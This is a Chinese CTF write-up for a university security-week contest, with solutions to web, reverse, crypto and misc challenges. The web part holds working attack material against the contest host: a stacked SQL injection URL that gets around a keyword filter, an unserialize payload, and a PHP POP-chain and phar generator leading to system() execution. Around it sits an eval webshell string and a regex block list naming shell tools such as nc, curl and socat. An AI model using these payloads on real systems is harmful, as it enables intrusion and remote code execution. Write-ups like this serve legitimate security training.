广西大学第一届 “网络安全宣传周” 信息安全实践赛wp

Web

baby_网站目录

f12 访问

image-20211022185535525

baby_request

get和post

image-20211022185802236

http://120.24.194.57:3702/request/?text1=yesyesyes&text2=goodgoodgood

text3=wellwellwell&text4=nicenicenice

baby_前端

image-20211022185843985

jsfuck 放控制台里跑一下就有了

image-20211022190135736

baby_预防虫虫!

image-20211022190222656

image-20211022190344846

五子棋

ban掉js 在/js/script里找flag

image-20211022190451764

baby_快来猜大小

嗯点

baby_注入

无过滤 直接sqlmap跑

ez_快来猜拳啊

cookie里的count值用来计数且固定 所以直接写脚本

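# coding=gbk
import requests
import re
url="http://120.24.194.57:3703/the_finger_guessing_game/index.php?b=quan"
session = requests.Session()


def exp():
    """Play the guessing game round by round and collect the flag characters it leaks.

    The server keeps the round counter only in the client-side ``count`` cookie,
    so each request re-sends the ``count`` value the previous response set.
    Every response whose body contains the marker "下面是你的flag:" contributes
    the single character that follows the marker to ``flags``.

    Returns the collected flag string. Unlike the original (which looped
    forever), the loop ends once the closing ``}`` has been collected (flags on
    this CTF have the form ``gxuctf{...}``) or when a response carries no
    ``count`` cookie, because the next request would then just repeat the round.
    """
    payload = "Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGE%3D"
    flags = ""
    # Everything except the Cookie header is constant; build it once, not per round.
    base_headers = {
        "Host": "120.24.194.57:3703",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.50",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://120.24.194.57:3703/the_finger_guessing_game/index.php?b=quan",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    }
    # Only the count value changes between rounds; the session identifiers are the ones from the original run.
    cookie_template = (
        "count={0}; welcomebanner_status=dismiss; cookieconsent_status=dismiss; "
        "language=en; continueCode=LRDPV4rmB3pze58njKXq9NdErHjTRi2MuZ3slNGQMgZ2wbvJalY6O1y7xoEW; "
        "PHPSESSID=8pa8oeu0hj8s4q79s1brd83st4"
    )
    while True:
        headers = dict(base_headers, Cookie=cookie_template.format(payload))
        response = session.get(url=url, headers=headers)
        if "下面是你的flag:" in response.text:
            match = re.search("下面是你的flag:(.)", response.text)
            # The marker may sit at the very end of the body; the original
            # would raise AttributeError on a None match here.
            if match:
                flags += match.group(1)
                print(flags)
        if flags.endswith("}"):
            break
        payload = response.cookies.get("count")
        if payload is None:
            print("no count cookie in response; stopping")
            break
    return flags


if __name__ == "__main__":
    exp()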

image-20211022191113442

ez_不能说的秘密

payload:

image-20211022192505296

<?php
header("Content-Type: text/html;charset=utf-8");
show_source(__FILE__);

// Object whose serialized form is the payload for this challenge.
// serialize() emits the property names and their declaration order verbatim,
// so both presumably have to match the target's class exactly - including the
// "usernmae" spelling (TODO confirm against the challenge source).
class a{
    public $usernmae = "admin";
    public $do_u_want_flag="yes! yes! yse!";
    public $youwant="flag2";
}
echo serialize(new a());

变量覆盖直接post secret

绕过直接ban掉js

ez_猜猜我是谁

原题应该是某一年国赛的just soso

这里用到反序列化的引用类型

大小写绕过正则即可

payload:

image-20211022193643880

ez_web

观察url 考虑base64

image-20211022193720679

MmUyZjZjNmY2NzZmMmU3MDZlNjc=

再考虑base64

2e2f6c6f676f2e706e67

考虑十六进制串解码

./logo.png

则考虑按规律改变文件名进行文件读取

读取./index.php

image-20211022193915693

base64解码

image-20211022193939504

easy_web2.0

依然考虑easy_web的文件构造方式,发现成功解码出tmp.jpg

考虑读取./index.php

image-20211022194104038

此处设置了open_basedir 意味着此题的所有文件大概都在这个目录下

在没有任何下一步的提示下(我做出时还没放hint)

考虑扫目录

image-20211019140101751

加入.php的后缀 扫出web.php

利用第一步的文件读取读取出web.php

image-20211022194510863

考点为弱比较和md5对数组使用的特性和伪协议

绕过兼满足条件payload

one[]=1&two[]=2&file=data://text/plain,welcome!&temp=O:4:"File":1:{s:3:"dir";s:9:"240610708";}

image-20211022194855247

用第一步的文件读取读取

flag_md(8ef52dea328bde9315cc15eb6b770519).php

image-20211022194938166

base64解码得

image-20211022195000362

SSSSSSSQL

试密码试出7777

image-20211022195105928

找了很久的注入点,一开始一直在登录界面和这个搜索框尝试注入,但一直没有结果。

后来发现这个页面中只有“查看”这个按钮是有功能性的,试图在前端用检查元素找出接口,但无法找到

只好翻前端的js

image-20211022195510457

审查到有77777777.php,传参为page和id

进去看看

先在page堆叠注,发现过滤了很多东西,fuzz一下发现几乎过滤所有东西,应该不是在这块地方注

在id堆叠注,发现

image-20211022195843677

成功注出

则依次show databases;use linkflag;show tables;

image-20211022195929811

show columns from ffffffflags

image-20211022200010054

找到f1a9

接下来强网杯随便注的payload来打,发现rename和alter都ban了

只剩预处理了

直接拿payload打

image-20211022200610042

http://120.24.194.57:3703/SSSSSSSQL/77777777.php?id=1';show databases;use linkflag;show tables;show columns from ffffffflags;seT @sql = CONCAT('se','lect f1a9 from ffffffflags;');Prepare stmt from @sql;EXEcUTE stmt;#

ez_反序列化

题目提示反序列化 考虑phar

因为满足phar三要素 可控上传 必需符号没ban 有读取文件的函数

先读./read.php

image-20211022200753291

发现class.php

读class.php

<?php
// Confines file access of this script to the given directory (PHP open_basedir).
ini_set('open_basedir','/var/www/html/bbunser/');

// Entry point of the object graph: its destructor is the first hook that runs
// when an unserialized instance is dropped.
class aa{
    public $name;

    public function __construct(){
        $this->name='aa';
    }

    // strtolower() needs a string, so when $name holds an object this forces a
    // string conversion, i.e. it invokes that object's __toString().
    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}

class ff{
    // private: reading it from outside the class goes through __get() below.
    private $content;
    public $func;

    public function __construct(){
        $this->content="\<?php @eval(\$_POST[1]);?>";
    }

    // Runs on a read of an inaccessible/undefined property. Calls the method
    // named by $this->func on the object stored in that property, passing the
    // raw POST 'cmd' value; the preg_match denylist is the only guard on that
    // value, and denylists of this kind are easy to miss cases in.
    public function __get($key){
        if(!preg_match('/bash|nc|exec|curl|whois|socat|telnet|python|php|perl|ruby|phpinfo|ls|cat|tac|nl|more|less|head|tail|sed|sort|uniq|rev|base|echo|mv|cp|rm|fl|la|ag|flag|\-|\?|\'|\^|\~|\>|\<|\$/i',$_POST['cmd'])){
            $this->$key->{$this->func}($_POST['cmd']);
        }else{
            echo "<br>don't hack";
        }
    }
}
class zz{
    public $filename;
    public $content='surprise';

    public function __construct($filename){
        $this->filename=$filename;
    }

    // Denylist on $filename: rejects a leading "/", "php:", "data", "zip" and
    // "../" (case-insensitive). It is a plain string check, so other stream
    // wrappers are not covered - the writeup reaches getFile() via phar://.
    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }

    // Reads the property named by $var from $this->filename. When $filename is
    // an object and that property is inaccessible, this triggers its __get().
    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        // this feature is abandoned, not going to write it
    }

    // Applies filter() and then reads $filename; dies with "404 not found"
    // when the content is empty.
    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }

    // String-conversion hook: calls the method named by POST 'method' on this
    // object with POST 'var' as its argument - method dispatch fully chosen by
    // the request - then returns $content.
    public function __toString(){
        $this->{$_POST['method']}($_POST['var']);
        return $this->content;
    }
}

class xx{
    public $name;
    public $arg;

    public function __construct(){
        $this->name='eval';
        $this->arg='phpinfo();';
    }

    // Runs for any call to an undefined method: the missing method's name is
    // used as a function name and invoked with the first argument. This is the
    // code-execution sink of the chain once the call site is request-controlled.
    public function __call($name,$arg){
        $name($arg[0]);
    }
}

接下来构造pop链

先payload:

<?php

// Left in from the challenge source: prints this generator's own code.
highlight_file(__FILE__);
// Head of the chain; no constructor here because the instance is built by hand below.
class aa{
    public $name;
    // strtolower() on an object in $name forces its __toString().
    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}

class ff{
    // Declared public here so it can be assigned when building the chain; in
    // the target it is private, which is what makes the read go through __get().
    public $content;
    public $func="assert";
    // Calls $this->func on the object in the requested property with POST 'cmd'.
    public function __get($key){
        if(!preg_match('/bash|nc|exec|curl|whois|socat|telnet|python|php|perl|ruby|phpinfo|ls|cat|tac|nl|more|less|head|tail|sed|sort|uniq|rev|base|echo|mv|cp|rm|fl|la|ag|flag|\-|\?|\'|\^|\~|\>|\<|\$/i',$_POST['cmd'])){
            $this->$key->{$this->func}($_POST['cmd']);
        }else{
            echo "<br>don't hack";
        }
    }
}
class zz{
    public $filename; // holds the ff object in the chain
    public $content='surprise';
    // Denylist on $filename; not relevant for the chain, kept to mirror the target.
    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }
    // Property read on $filename: with an ff object there and an inaccessible
    // property name in $var, this lands in ff::__get().
    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        // this feature is abandoned, not going to write it
    }
    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }

    // Dispatches the POST-selected method with the POST-selected argument.
    public function __toString(){
        $this->{$_POST['method']}($_POST['var']); //method=write var=content cmd='phpinfo();'
        return $this->content;
    }
}

class xx{
    public $name;
    public $arg;
    // Undefined-method hook: the method name becomes the function to call.
    public function __call($name,$arg){
        $name($arg[0]);
    }
}
// Build the object graph: aa -> zz (name) -> ff (filename) -> xx (content).
$aa =new aa();
$aa->name=new zz();
$aa->name->filename=new ff();
$aa->name->filename->content=new xx();
echo serialize($aa);

// Write the graph into the metadata of a fresh phar archive.
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub
// NOTE(review): `aa` here is a bare identifier, not the `$aa` variable built above.
// As written it presumably does not embed the object (PHP 7 falls back to the
// string "aa" with a warning, PHP 8 throws an Error) - likely a transcription slip.
$phar->setMetadata(aa); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
?>
gxuctf{4d8028dd-dfec-4b5c-b4ad-ec5540664fcc}
入口为__destruct strtolower能进入tostring 则进入zz中 考虑tostring中调用的函数带有参数,而zz中正好有write可以传参调用,则考虑调用write,还剩一个__call和一个__get,发现content是private属性,则正好可以调用get,发现__get,最后进入__call命令执行 至此pop构造完成
post内容为method=write&var=content&cmd=system("l\s");

网上找一个phar的生成文件 生成一个phar.phar传上去,file用phar协议读

最终payload:

image-20211022201542112

直接读

image-20211022201619901

但是这题只能用tac读而不能用cat读 我一度以为是我的链子坏了或者哪个地方出错了 考虑环境问题吧还是

Reverse

除了我以外都是非酋

丢进ida 看看cj和cc

看看汇编就知道啦

ord('a')=97,97+14=111,将111和Output数组异或,得到flag

玩玩游戏就拿到答案啦

cheat engine 开外挂 改分

看看程序就出来啦

python脚本逆着解密

脚本删了 大概是重新写一个func 的lambda 然后重新和盐值异或

做出的逆向题不到600分 蚌埠住了

Crypto

secret

二进制转字符串

TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCmZxd25sbXksIGR0eid3aiBmcXJ0eHkgeW1qd2ohIHN0YiBrdHcgeW1qIGtuc2ZxIChmc2kgcmZkZ2ogeW1qIG1md2lqeHkuLi4pIHVmd3k6IGYgeHpneHlueXp5bnRzIGhudW1qdy4gbnMgeW1qIGt0cXF0Ym5zbCB5amN5LCBuJ2FqIHlmcGpzIHJkIHJqeHhmbGogZnNpIHdqdXFmaGppIGphandkIGZxdW1mZ2p5bmggaG1md2ZoeWp3IGJueW0gZiBodHd3anh1dHNpanNoaiB5dCBmIGlua2tqd2pzeSBobWZ3Zmh5ancgLSBwc3RicyBmeCBmIHh6Z3h5bnl6eW50cyBobnVtancuIGhmcyBkdHoga25zaSB5bWoga25zZnEga3FmbD8gbW5zeTogYmogcHN0YiB5bWZ5IHltaiBrcWZsIG54IGx0bnNsIHl0IGdqIHRrIHltaiBrdHdyZnkgbGN6aHlrey4uLn0gLSBibW5obSByamZzeCB5bWZ5IG5rIGR0eiB4amogeW1meSB1Znl5andzLCBkdHogcHN0YiBibWZ5IHltaiBodHd3anh1dHNpanNoangga3R3IGwsIGMsIHosIGgsIHksIGZzaSBrIGZ3ai4gZHR6IGhmcyB1d3RnZmdxZCBidHdwIHR6eSB5bWogd2pyZm5zbnNsIGhtZndmaHlqd3ggZ2Qgd2p1cWZobnNsIHltanIgZnNpIG5za2p3d25zbCBodHJydHMgYnR3aXggbnMgeW1qIGpzbHFueG0gcWZzbHpmbGouIGZzdHltancgbHdqZnkgcmp5bXRpIG54IHl0IHp4aiBrd2p2empzaGQgZnNmcWR4bng6IGJqIHBzdGIgeW1meSAnaicgeG10YnggenUgcnR4eSB0a3lqcyBucyB5bWogZnF1bWZnanksIHh0IHltZnkneCB1d3RnZmdxZCB5bWogcnR4eSBodHJydHMgaG1md2ZoeWp3IG5zIHltaiB5amN5LCBrdHFxdGJqaSBnZCAneScsIGZzaSB4dCB0cy4gdHNoaiBkdHogcHN0YiBmIGtqYiBobWZ3Zmh5and4LCBkdHogaGZzIG5za2p3IHltaiB3anh5IHRrIHltaiBidHdpeCBnZnhqaSB0cyBodHJydHMgYnR3aXggeW1meSB4bXRiIHp1IG5zIHltaiBqc2xxbnhtIHFmc2x6ZmxqLgpmenF2cmh1eW1odWp6cWkhIGd6eSB3aGJ0IGVqcWppd3RzIHV3dCBwdHZqcXF0ciBmcmdsdXp2cmhsd2cgZndobW10cXZ0LiB3dHJ0IGppIGggZW1odiBlenIgaG1tIGd6eXIgd2hycyB0ZWV6cnVpOiB2bnlmdWV7cTB4X3V3NHVpX3h3NHVfal9mNG1tX2ZyZ2x1MH0uIGd6eSB4am1tIGVqcXMgdXdodSBoIG16dSB6ZSBmcmdsdXp2cmhsd2cgamkgb3lpdSBweWptc2pxdiB6ZWUgdXdqaSBpenJ1IHplIHBoaWpmIGtxenhtdHN2dCwgaHFzIGp1IHJ0aG1tZyBqaSBxenUgaXogcGhzIGhldXRyIGhtbS4gd3psdCBnenkgdHFvemd0cyB1d3QgZndobW10cXZ0IQ==

base64

New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).
fqwnlmy, dtz'wj fqrtxy ymjwj! stb ktw ymj knsfq (fsi rfdgj ymj mfwijxy...) ufwy: f xzgxynyzynts hnumjw. ns ymj ktqqtbnsl yjcy, n'aj yfpjs rd rjxxflj fsi wjuqfhji jajwd fqumfgjynh hmfwfhyjw bnym f htwwjxutsijshj yt f inkkjwjsy hmfwfhyjw - pstbs fx f xzgxynyzynts hnumjw. hfs dtz knsi ymj knsfq kqfl? mnsy: bj pstb ymfy ymj kqfl nx ltnsl yt gj tk ymj ktwrfy lczhyk{...} - bmnhm rjfsx ymfy nk dtz xjj ymfy ufyyjws, dtz pstb bmfy ymj htwwjxutsijshjx ktw l, c, z, h, y, fsi k fwj. dtz hfs uwtgfgqd btwp tzy ymj wjrfnsnsl hmfwfhyjwx gd wjuqfhnsl ymjr fsi nskjwwnsl htrrts btwix ns ymj jslqnxm qfslzflj. fstymjw lwjfy rjymti nx yt zxj kwjvzjshd fsfqdxnx: bj pstb ymfy 'j' xmtbx zu rtxy tkyjs ns ymj fqumfgjy, xt ymfy'x uwtgfgqd ymj rtxy htrrts hmfwfhyjw ns ymj yjcy, ktqqtbji gd 'y', fsi xt ts. tshj dtz pstb f kjb hmfwfhyjwx, dtz hfs nskjw ymj wjxy tk ymj btwix gfxji ts htrrts btwix ymfy xmtb zu ns ymj jslqnxm qfslzflj.
fzqvrhuymhujzqi! gzy whbt ejqjiwts uwt ptvjqqtr frgluzvrhlwg fwhmmtqvt. wtrt ji h emhv ezr hmm gzyr whrs teezrui: vnyfue{q0x_uw4ui_xw4u_j_f4mm_frglu0}. gzy xjmm ejqs uwhu h mzu ze frgluzvrhlwg ji oyiu pyjmsjqv zee uwji izru ze phijf kqzxmtsvt, hqs ju rthmmg ji qzu iz phs heutr hmm. wzlt gzy tqozgts uwt fwhmmtqvt!

原题 凯撒+替换

上ctfcrack

image-20211022203329756

替代直接爆破 写wp的时候找不到那个网站了…

base

直接上basecrack 先base92再 中间还有ascii和base64 32具体顺序忘了

最后十六进制转字符串 gxuctf{y0u_r_the_ma3ter_o5_base_decoding!}

ezRSA

原题 跑e的脚本删了 跑出来52361

这是最后的解密脚本 原题直接拿的

image-20211022204146945

python3.9装crypto库没有bytes_to_long 所以删去bytes_to_long拿到字符串后去官方环境跑结果

image-20211022204339854

V

向下看看到了键盘

第一步解出维吉尼亚vigenere

猜测为压缩包文件密码和提示

直接猜秘钥gxuctf命中

MISC

签到

与佛论禅

how much

上脚本

import re
def upper2num(s):
    """Convert a Chinese financial-numeral amount to an integer number of fen.

    ``"玖佰陆拾贰元陆角肆分"`` -> ``96264`` (i.e. 962.64 yuan). Each unit character
    (仟, 佰, 拾, 元, 角, 分) contributes ``weight * digit``, where the digit is the
    single character immediately before the unit. An amount that starts with 拾
    (e.g. 拾贰元) counts as one ten, since the 壹 is implicit.

    A non-digit character before 仟/佰/拾/角/分 raises ValueError from
    ``list.index``; before 元 it is skipped, so 壹拾元 does not count the 拾
    twice.
    """
    digits = ['零', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖']
    total = 0

    # Unit character -> weight in fen; evaluated in the same order as before.
    for unit, weight in (('仟', 100000), ('佰', 10000), ('拾', 1000)):
        found = re.findall('(.)' + unit, s)
        if found:
            total += weight * digits.index(found[0])

    if re.match(r'^拾', s):  # leading 拾 (拾几元) means "one ten"; 壹拾几元 is handled above
        total += 1000

    found = re.findall(r'(.)元', s)
    if found and found[0] in digits:
        total += 100 * digits.index(found[0])

    for unit, weight in (('角', 10), ('分', 1)):
        found = re.findall('(.)' + unit, s)
        if found:
            total += weight * digits.index(found[0])

    return total

# Sanity check on one amount, then total every line of the input file in yuan.
print(upper2num("玖佰陆拾贰元陆角肆分")/100)
total = 0
with open("D:/FireFoxDownload/how_much.txt", "r", encoding="utf8") as amounts:
    for amount in amounts:
        total = total + upper2num(amount) / 100
print(total)

出结果保留两位小数

鹦鹉学舌

image-20211019192749676

用Pr找到这一帧 一直没搞懂和docx有什么关系

考虑培根密码

gxuctf{wecomexaxh}

好多word

python的docx库装起来很麻烦

用java写的脚本

package src;
import org.apache.poi.POIXMLDocument;
import org.apache.poi.POIXMLTextExtractor;
import org.apache.poi.hwpf.extractor.WordExtractor;
import org.apache.poi.openxml4j.opc.OPCPackage;
import org.apache.poi.xwpf.extractor.XWPFWordExtractor;

import java.io.FileInputStream;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

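/**
 * Scans a numbered series of Word documents (.doc / .docx) and prints the full
 * text of every document that contains a {@code gxuctf{...}} flag.
 */
class TestPoi {

    /** Directory holding the numbered {@code <n>ya.docx} files (path from the original run). */
    private static final String DOC_DIR =
            "C:/Users/86151/Documents/Tencent Files/821361403/FileRecv/word_very_big/";

    /** Exclusive upper bound of the file numbers to scan (1 .. DOC_COUNT-1, as in the original loop). */
    private static final int DOC_COUNT = 500;

    /**
     * Flag prefix, matched case-insensitively anywhere in the text. Compiled once
     * instead of re-parsing a pattern string on every file; {@code find()} replaces
     * the original {@code [\s\S]+...[\s\S]+} full-match, which also required at
     * least one character before and after the prefix.
     */
    private static final Pattern FLAG_PATTERN = Pattern.compile("gxuctf\\{", Pattern.CASE_INSENSITIVE);

    public static void main(String[] args) {
        TestPoi tp = new TestPoi();
        for (int i = 1; i < DOC_COUNT; i++) {
            String content = tp.readWord(DOC_DIR + i + "ya.docx");
            if (FLAG_PATTERN.matcher(content).find()) {
                System.out.println(content);
            }
        }
    }

    /**
     * Reads the plain text of a Word document.
     *
     * @param path path of the document; the extension selects the POI extractor
     *             ({@code .doc} vs {@code docx}), anything else is reported and skipped
     * @return the document text, or an empty string when the file is not a Word
     *         file or could not be read (errors are logged, not propagated, so one
     *         bad file does not abort the scan)
     */
    public String readWord(String path) {
        String buffer = "";
        try {
            if (path.endsWith(".doc")) {
                // try-with-resources closes the stream even when the extractor throws;
                // the original only closed it on the success path
                try (FileInputStream is = new FileInputStream(path)) {
                    WordExtractor ex = new WordExtractor(is);
                    buffer = ex.getText();
                }
            } else if (path.endsWith("docx")) {
                try (OPCPackage opcPackage = POIXMLDocument.openPackage(path)) {
                    POIXMLTextExtractor extractor = new XWPFWordExtractor(opcPackage);
                    buffer = extractor.getText();
                }
            } else {
                System.out.println("此文件不是word文件!");
            }
        } catch (Exception e) {
            // best-effort per file: report which path failed and keep going
            System.err.println("failed to read " + path + ": " + e);
        }
        return buffer;
    }
}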

image-20211020135441723

____end